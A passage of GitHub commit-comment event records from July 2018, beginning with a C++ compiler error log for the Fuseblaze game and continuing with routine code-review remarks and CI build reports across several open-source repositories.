'sp::RenderQueue::RenderQueue()'\n     : sp::RenderPass()\n                      ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note: candidate: sp::RenderQueue::RenderQueue(const Matrix4x4d&, const Matrix4x4d&)\n     RenderQueue(const Matrix4x4d& camera_projection, const Matrix4x4d& camera_transform);\n     ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note:   candidate expects 2 arguments, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(const sp::RenderQueue&)\n class RenderQueue\n       ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(sp::RenderQueue&&)\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:10:22: error: no matching function for call to 'sp::RenderQueue::RenderQueue()'\n     : sp::RenderPass()\n                      ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note: candidate: sp::RenderQueue::RenderQueue(const Matrix4x4d&, const Matrix4x4d&)\n     RenderQueue(const Matrix4x4d& camera_projection, const Matrix4x4d& camera_transform);\n     ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note:   candidate expects 2 arguments, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(const sp::RenderQueue&)\n class RenderQueue\n       ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(sp::RenderQueue&&)\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:10:22: error: no matching function for call to 'sp::RenderQueue::RenderQueue()'\n     : sp::RenderPass()\n                      ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note: candidate: sp::RenderQueue::RenderQueue(const Matrix4x4d&, const Matrix4x4d&)\n     RenderQueue(const Matrix4x4d& camera_projection, const Matrix4x4d& camera_transform);\n     ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note:   candidate expects 2 arguments, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(const sp::RenderQueue&)\n class RenderQueue\n       ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(sp::RenderQueue&&)\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:10:22: error: no matching function for call to 'sp::RenderQueue::RenderQueue()'\n     : sp::RenderPass()\n                      ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note: candidate: sp::RenderQueue::RenderQueue(const Matrix4x4d&, const Matrix4x4d&)\n     RenderQueue(const Matrix4x4d& camera_projection, const Matrix4x4d& camera_transform);\n     ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note:   candidate expects 2 arguments, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(const sp::RenderQueue&)\n class RenderQueue\n       ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(sp::RenderQueue&&)\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:10:22: error: no matching function for call to 'sp::RenderQueue::RenderQueue()'\n     : sp::RenderPass()\n                      ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note: candidate: sp::RenderQueue::RenderQueue(const Matrix4x4d&, const Matrix4x4d&)\n     RenderQueue(const Matrix4x4d& camera_projection, const Matrix4x4d& camera_transform);\n     ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:13:5: note:   candidate expects 2 arguments, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(const sp::RenderQueue&)\n class RenderQueue\n       ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note: candidate: sp::RenderQueue::RenderQueue(sp::RenderQueue&&)\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:10:7: note:   candidate expects 1 argument, 0 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h: In member function 'virtual void ShadowRenderPass::render(sp::P<sp::GraphicsLayer>, float)':\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:32:30: error: 'class sp::RenderQueue' has no member named 'clear'\n             pre_shadow_queue.clear();\n                              ^~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:33:26: error: 'class sp::RenderQueue' has no member named 'clear'\n             shadow_queue.clear();\n                          ^~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:34:36: error: 'class sp::RenderQueue' has no member named 'clear'\n             player_shadow_queue[0].clear();\n                                    ^~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:35:36: error: 'class sp::RenderQueue' has no member named 'clear'\n             player_shadow_queue[1].clear();\n                                    ^~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:36:31: error: 'class sp::RenderQueue' has no member named 'clear'\n             post_shadow_queue.clear();\n                               ^~~~~\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:40:106: error: no matching function for call to 'sp::RenderQueue::render(const Matrix4x4d&, sp::Matrix4x4<double>)'\n             pre_shadow_queue.render(camera->getProjectionMatrix(), camera->getGlobalTransform().inverse());\n                                                                                                          ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note: candidate: void sp::RenderQueue::render()\n     void render();\n          ^~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note:   candidate expects 0 arguments, 2 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:55:106: error: no matching function for call to 'sp::RenderQueue::render(const Matrix4x4d&, sp::Matrix4x4<double>)'\n                 shadow_queue.render(camera->getProjectionMatrix(), camera->getGlobalTransform().inverse());\n                                                                                                          ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note: candidate: void sp::RenderQueue::render()\n     void render();\n          ^~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note:   candidate expects 0 arguments, 2 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:56:116: error: no matching function for call to 'sp::RenderQueue::render(const Matrix4x4d&, sp::Matrix4x4<double>)'\n                 player_shadow_queue[n].render(camera->getProjectionMatrix(), camera->getGlobalTransform().inverse());\n                                                                                                                    ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note: candidate: void sp::RenderQueue::render()\n     void render();\n          ^~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note:   candidate expects 0 arguments, 2 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:68:107: error: no matching function for call to 'sp::RenderQueue::render(const Matrix4x4d&, sp::Matrix4x4<double>)'\n                 overlay_queue.render(camera->getProjectionMatrix(), camera->getGlobalTransform().inverse());\n                                                                                                           ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note: candidate: void sp::RenderQueue::render()\n     void render();\n          ^~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note:   candidate expects 0 arguments, 2 provided\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:73:107: error: no matching function for call to 'sp::RenderQueue::render(const Matrix4x4d&, sp::Matrix4x4<double>)'\n             post_shadow_queue.render(camera->getProjectionMatrix(), camera->getGlobalTransform().inverse());\n                                                                                                           ^\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:5:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note: candidate: void sp::RenderQueue::render()\n     void render();\n          ^~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderqueue.h:16:10: note:   candidate expects 0 arguments, 2 provided\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp: In function 'int main(int, char**)':\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:160:57: error: invalid new-expression of abstract class type 'ShadowRenderPass'\n         shadow_pass = new ShadowRenderPass(scene, camera);\n                                                         ^\nIn file included from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:26:0:\n/home/daid/_tinyci/daid/Fuseblaze/src/shadowRenderPass.h:6:7: note:   because the following virtual functions are pure within 'ShadowRenderPass':\n class ShadowRenderPass : public sp::RenderPass\n       ^~~~~~~~~~~~~~~~\nIn file included from /home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/basicnoderenderpass.h:4:0,\n                 from /home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:8:\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderpass.h:16:18: note: \tvirtual void sp::RenderPass::renderSetup(float)\n     virtual void renderSetup(float aspect_ratio) = 0;\n                  ^~~~~~~~~~~\n/home/daid/_tinyci/daid/SeriousProton2/include/sp2/graphics/scene/renderpass.h:17:18: note: \tvirtual void sp::RenderPass::renderExecute()\n     virtual void renderExecute() = 0;\n                  ^~~~~~~~~~~~~\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/main.cpp.o] Error 1\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-13T20:03:43Z"}
{"id":"7964094391","type":"CommitCommentEvent","actor":{"login":"DissonancePM"},"repo":{"name":"frizzy445/Oswalds-Server"},"payload":{"comment":{"id":29704698,"position":null,"line":null,"path":null,"commit_id":"c24a61df9eef4467f7b6569d5a08a56d20eb4391","created_at":"2018-07-13T20:03:45Z","updated_at":"2018-07-13T20:03:45Z","author_association":"COLLABORATOR","body":"thanks"}},"created_at":"2018-07-13T20:03:45Z"}
{"id":"7964094811","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704700,"position":57,"line":272,"path":"prov/mrail/src/mrail_cq.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:03:50Z","updated_at":"2018-07-13T20:03:50Z","author_association":"NONE","body":"Why is this here?  Or why doesn't mrail_cq_progress already progress the EPs?"}},"created_at":"2018-07-13T20:03:50Z"}
{"id":"7964098125","type":"CommitCommentEvent","actor":{"login":"Radviger"},"repo":{"name":"kashike/SGCraft"},"payload":{"comment":{"id":29704706,"position":null,"line":null,"path":null,"commit_id":"385df015df17aefc310152f4e688350b6b95ca1e","created_at":"2018-07-13T20:04:38Z","updated_at":"2018-07-13T20:04:38Z","author_association":"NONE","body":"You could use new LoopingSoundSource from my branch to add nice zpm sounds :)"}},"created_at":"2018-07-13T20:04:38Z"}
{"id":"7964098152","type":"CommitCommentEvent","actor":{"login":"aptmac"},"repo":{"name":"aptmac/fabric8-ui"},"payload":{"comment":{"id":29704707,"position":44,"line":72,"path":"src/app/dashboard-widgets/work-item-widget/work-item-widget.component.ts","commit_id":"c38275644cc1fda720cc01f1f16e7f6294798ba5","created_at":"2018-07-13T20:04:39Z","updated_at":"2018-07-13T20:04:39Z","author_association":"OWNER","body":"No, one-line all the things."}},"created_at":"2018-07-13T20:04:39Z"}
{"id":"7964099992","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29704713,"position":null,"line":null,"path":null,"commit_id":"a024020a4693aba096d79f44b6338d96b3f43361","created_at":"2018-07-13T20:05:04Z","updated_at":"2018-07-13T20:05:04Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-367](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-367).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-367-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-13T20:05:04Z"}
{"id":"7964100459","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704714,"position":21,"line":220,"path":"prov/mrail/src/mrail_cq.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:05:11Z","updated_at":"2018-07-13T20:05:11Z","author_association":"OWNER","body":"Line 223, no?"}},"created_at":"2018-07-13T20:05:11Z"}
{"id":"7964101272","type":"CommitCommentEvent","actor":{"login":"havok2063"},"repo":{"name":"sdss/marvin"},"payload":{"comment":{"id":29704715,"position":1,"line":1,"path":".github/PULL_REQUEST_TEMPLATE.md","commit_id":"271567fe6db4dd8793d7b033c8aada08c154f6a3","created_at":"2018-07-13T20:05:22Z","updated_at":"2018-07-13T20:05:22Z","author_association":"CONTRIBUTOR","body":"For the completionist in me, and really...in all of us, we should make the rest of these green \r\nhttps://github.com/sdss/marvin/community\r\n"}},"created_at":"2018-07-13T20:05:22Z"}
{"id":"7964101673","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704717,"position":63,"line":755,"path":"prov/mrail/src/mrail_ep.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:05:27Z","updated_at":"2018-07-13T20:05:27Z","author_association":"NONE","body":"Please move to a single error cleanup path."}},"created_at":"2018-07-13T20:05:27Z"}
{"id":"7964102786","type":"CommitCommentEvent","actor":{"login":"rui314"},"repo":{"name":"uoo38/uoocc"},"payload":{"comment":{"id":29704719,"position":6,"line":37,"path":"vector.c","commit_id":"fc2d5a803ffbd65c29584e5703ab06a2a0747eff","created_at":"2018-07-13T20:05:44Z","updated_at":"2018-07-13T20:05:44Z","author_association":"NONE","body":"この条件が満たされるときは単にバグっているだけなので、`assert(0 <= pos && pos < v->size)`にしたほうがいいはず。コードはありえない条件のときに「リーズナブルに」動く必要はなくて、考えうる最も簡単なこと（なにもしないとかassertするとか）をするのがよいです。実行を続けてもすでに扱っているデータがバグっている以上意味がないので。"}},"created_at":"2018-07-13T20:05:44Z"}
{"id":"7964104823","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-pwa-workflow"},"payload":{"comment":{"id":29704730,"position":15,"line":15,"path":"src/visit/ActiveVisitsQueue.jsx","commit_id":"df6651fa7db0d49fb895cc95d7c9e0deed0d2712","created_at":"2018-07-13T20:06:14Z","updated_at":"2018-07-13T20:06:14Z","author_association":"MEMBER","body":"Cool, neat that we can provide getter functions like this."}},"created_at":"2018-07-13T20:06:14Z"}
{"id":"7964105707","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29704731,"position":4,"line":45,"path":"Applications/spire/source/book_view/book_view_level_properties_widget.cpp","commit_id":"dff5399683cdcd8773d9182c8d2df05f9275279d","created_at":"2018-07-13T20:06:27Z","updated_at":"2018-07-13T20:06:27Z","author_association":"COLLABORATOR","body":"You're making a copy of an entire vector just to get it's size."}},"created_at":"2018-07-13T20:06:27Z"}
{"id":"7964108605","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704740,"position":209,"line":209,"path":"prov/mrail/src/mrail_rma.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:07:12Z","updated_at":"2018-07-13T20:07:12Z","author_association":"NONE","body":"nit: Can we avoid 1 parameter per line?  It just makes the function longer and my poor little fingers scroll more."}},"created_at":"2018-07-13T20:07:12Z"}
{"id":"7964112632","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704756,"position":null,"line":null,"path":null,"commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:08:11Z","updated_at":"2018-07-13T20:08:11Z","author_association":"NONE","body":"I think this is pretty close.  It needs some minor cleanup.  But once you have those, I think you can just post it to a PR for further review and merging."}},"created_at":"2018-07-13T20:08:11Z"}
{"id":"7964113483","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29704758,"position":13,"line":181,"path":"builtin/rebase.c","commit_id":"48e794adc9ec29f4a970b88653dfe20de3bf87a6","created_at":"2018-07-13T20:08:23Z","updated_at":"2018-07-13T20:08:23Z","author_association":"NONE","body":"This change does not belong into this commit, does it?"}},"created_at":"2018-07-13T20:08:23Z"}
{"id":"7964114720","type":"CommitCommentEvent","actor":{"login":"albireox"},"repo":{"name":"sdss/marvin"},"payload":{"comment":{"id":29704760,"position":1,"line":1,"path":".github/PULL_REQUEST_TEMPLATE.md","commit_id":"271567fe6db4dd8793d7b033c8aada08c154f6a3","created_at":"2018-07-13T20:08:42Z","updated_at":"2018-07-13T20:08:42Z","author_association":"COLLABORATOR","body":"We are almost there! We have issue templates, a code of conduct, and new documentation for contributing."}},"created_at":"2018-07-13T20:08:42Z"}
{"id":"7964115309","type":"CommitCommentEvent","actor":{"login":"Shahar-Y"},"repo":{"name":"meateam/seal"},"payload":{"comment":{"id":29704761,"position":5,"line":7,"path":"mocha.opts","commit_id":"d31ff22a5dd15a87a0ce335684b4d29ab49260aa","created_at":"2018-07-13T20:08:50Z","updated_at":"2018-07-13T20:08:50Z","author_association":"COLLABORATOR","body":"The problem was here apparently.\r\nIn windows, the first beforeEach hook probably took more time than 2000ms, hence caused all the tests to fail."}},"created_at":"2018-07-13T20:08:50Z"}
{"id":"7964116991","type":"CommitCommentEvent","actor":{"login":"cletusw"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29704768,"position":18,"line":91,"path":"src/AlertDialog.js","commit_id":"1f05597efec5d2e65c5762c8b721bb1862d53a06","created_at":"2018-07-13T20:09:15Z","updated_at":"2018-07-13T20:09:15Z","author_association":"CONTRIBUTOR","body":"Why not [Array.prototype.find()](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/find) now that you've dropped IE11 support?"}},"created_at":"2018-07-13T20:09:15Z"}
{"id":"7964117035","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-pwa-workflow"},"payload":{"comment":{"id":29704769,"position":5,"line":47,"path":"src/patient/PatientHeader.jsx","commit_id":"3fdb2f3d58da1afb025abbdb1805f977b18add01","created_at":"2018-07-13T20:09:16Z","updated_at":"2018-07-13T20:09:16Z","author_association":"MEMBER","body":"\r\nFor what it's worth,  e can change this to just fetch the primary identifier once we have this ticket implemented:\r\n\r\nhttps://tickets.pih-emr.org/browse/WOR-44\r\n"}},"created_at":"2018-07-13T20:09:16Z"}
{"id":"7964118218","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704771,"position":21,"line":220,"path":"prov/mrail/src/mrail_cq.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:09:32Z","updated_at":"2018-07-13T20:09:32Z","author_association":"NONE","body":"Not if you goto error..."}},"created_at":"2018-07-13T20:09:32Z"}
{"id":"7964123710","type":"CommitCommentEvent","actor":{"login":"thundersnow-automation"},"repo":{"name":"thundersnow-automation/devportal-d8"},"payload":{"comment":{"id":29704783,"position":null,"line":null,"path":null,"commit_id":"378adeb99f9b9e06314e86ad97e53d8ae3098889","created_at":"2018-07-13T20:10:55Z","updated_at":"2018-07-13T20:10:55Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#ci-4](https://dashboard.pantheon.io/sites/e3db992f-35fa-4eec-b1cd-3e71f022fbfd#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-13T20:10:55Z"}
{"id":"7964124187","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29704787,"position":153,"line":173,"path":"builtin/rebase.c","commit_id":"f8429e950a45abe3b78f457491e26ea913b6730b","created_at":"2018-07-13T20:11:02Z","updated_at":"2018-07-13T20:11:02Z","author_association":"NONE","body":"I just noticed that this variable is used in the `--am`, `--interactive` and `--preserve-merges` backends. Therefore, this cannot be a local variable in `cmd_rebase()` but needs to be a field in `rebase_options` so that `run_specific_rebase()` can `add_var()` it.\r\n\r\nPlease amend this commit accordingly."}},"created_at":"2018-07-13T20:11:02Z"}
{"id":"7964124457","type":"CommitCommentEvent","actor":{"login":"yburette"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29704788,"position":21,"line":220,"path":"prov/mrail/src/mrail_cq.c","commit_id":"36f8547c983b6a1a83119e1d2687ca5ef4bb1fc6","created_at":"2018-07-13T20:11:07Z","updated_at":"2018-07-13T20:11:07Z","author_association":"OWNER","body":"Gotcha. I need to figure out how to reserve the CQ entry so we can avoid this error case entirely."}},"created_at":"2018-07-13T20:11:07Z"}
{"id":"7964127034","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29704794,"position":null,"line":null,"path":null,"commit_id":"c31e23de8d7f2f21bf99ec3a9b1e057501a0462f","created_at":"2018-07-13T20:11:45Z","updated_at":"2018-07-13T20:11:45Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2315 of 2315 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-13T20:11:45Z"}
{"id":"7964132670","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29704803,"position":null,"line":null,"path":null,"commit_id":"c31e23de8d7f2f21bf99ec3a9b1e057501a0462f","created_at":"2018-07-13T20:13:11Z","updated_at":"2018-07-13T20:13:11Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T20:13:11Z"}
{"id":"7964135151","type":"CommitCommentEvent","actor":{"login":"Shahar-Y"},"repo":{"name":"meateam/seal"},"payload":{"comment":{"id":29704805,"position":null,"line":null,"path":null,"commit_id":"d31ff22a5dd15a87a0ce335684b4d29ab49260aa","created_at":"2018-07-13T20:13:43Z","updated_at":"2018-07-13T20:13:43Z","author_association":"COLLABORATOR","body":"Don't get confused, it's @AllKinds who solved this bug. I would never find it by myself (I sat the whole week on it and couldn't find the solution). Luckily I have a very talented and kind boss, who sacrificed his Friday Night to find this simple bug. Thank You!"}},"created_at":"2018-07-13T20:13:43Z"}
{"id":"7964135470","type":"CommitCommentEvent","actor":{"login":"Herny64"},"repo":{"name":"Herny64/qutebrowser"},"payload":{"comment":{"id":29704807,"position":null,"line":null,"path":null,"commit_id":"f212e776578592725de50f22e4625ea4d44ab911","created_at":"2018-07-13T20:13:48Z","updated_at":"2018-07-13T20:13:48Z","author_association":"OWNER","body":"example usecase:\r\nopen youtube videos without entering hinting mode:\r\nconfig.bind('3', 'spawn mpv {link_hovered}')"}},"created_at":"2018-07-13T20:13:48Z"}
